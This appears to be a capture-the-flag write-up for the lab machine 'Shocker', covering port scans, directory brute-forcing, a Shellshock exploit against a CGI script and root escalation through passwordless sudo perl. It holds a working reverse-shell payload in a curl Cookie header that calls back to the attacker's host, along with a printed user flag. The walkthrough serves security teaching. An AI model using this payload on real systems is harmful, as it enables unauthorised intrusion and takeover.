Shocker executive summary goes here … to-do
Task Overview
- Task in progress
Reconnaissance
Starting with an masscan and nmap to find the open ports and services on 10.10.10.56:
1
2
3
4
5
6
7
8
9
10
# sudo masscan -e tun0 -p0-65535 --max-rate 500 10.10.10.56
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-10-27 07:52:29 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 2222/tcp on 10.10.10.56
Discovered open port 80/tcp on 10.10.10.56
^Cwaiting several seconds to exit...
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ nmap -sC -sV -p80,2222 10.10.10.56
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-27 16:02 AWST
Nmap scan report for 10.10.10.56
Host is up (0.26s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.02 seconds
Webpage (Port 80)
Website doesn’t have anything of interest to me at the moment.
Lets run a gobuster:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.56/ -t 50
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.56/
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/10/27 16:10:12 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/cgi-bin/ (Status: 403)
/server-status (Status: 403)
===============================================================
2020/10/27 16:12:01 Finished
===============================================================
Intesting, we have a /cig-bin/ directory. This can be utilised by admins to upload scripts that can be executed. Lets enumerate the folder for any scripts.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
# gobuster dir -u http://10.10.10.56/cgi-bin -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -x py,sh,php,js -t 50
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.56/cgi-bin
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: py,sh,php,js
[+] Timeout: 10s
===============================================================
2020/10/27 16:15:23 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.py (Status: 403)
/.hta.sh (Status: 403)
/.hta.php (Status: 403)
/.hta.js (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.py (Status: 403)
/.htpasswd.sh (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.js (Status: 403)
/.htaccess (Status: 403)
/.htaccess.sh (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.js (Status: 403)
/.htaccess.py (Status: 403)
/user.sh (Status: 200)
Lets see what /cgi-bin/user.sh does, noting the Status: 200:
1
2
3
4
5
6
7
$ curl http:/10.10.10.56/cgi-bin/user.sh
Content-Type: text/plain
Just an uptime test script
04:27:22 up 28 min, 0 users, load average: 0.08, 0.05, 0.01
Okay, as this is an easy box, we can assume (given the machine name) that shellshock is a good option to try
1
2
3
$ curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.14.3/4443 0>&1' http://10.10.10.56/cgi-bin/user.sh
Listening with nc on port 4443 we catch the reverse shell:
1
2
3
4
5
6
7
8
9
10
11
$ nc -nlvp 4443
listening on [any] 4443 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.56] 45950
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ ls
ls
user.sh
shelly@Shocker:/usr/lib/cgi-bin$
Lets enumerate user and find the user flag:
1
2
3
4
5
6
7
8
9
10
11
12
shelly@Shocker:/usr$ whoami
whoami
shelly
shelly@Shocker:/usr$ wc -c /home/shelly/user.txt
wc -c /home/shelly/user.txt
33 /home/shelly/user.txt
shelly@Shocker:/usr$ cat /home/shelly/user.txt
cat /home/shelly/user.txt
2ec24e11320026d1e70ff3e16695b233
shelly@Shocker:/usr$
Privilege Escalation
Now with an easy box, first command that is always good is sudo -l to see where we can run sudo without giving a password.
1
2
3
4
5
6
7
8
9
10
11
$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
And we notice that perl infact has this configuration! Therefore we can use perl to spawn us a new elevated shell.
1
2
3
4
5
6
7
8
9
$ sudo perl -e 'exec "/bin/bash"'
sudo perl -e 'exec "/bin/bash"'
whoami
root
wc -c /root/root.txt
33 /root/root.txt
cat /root/root.txt
Thanks for reading. BQ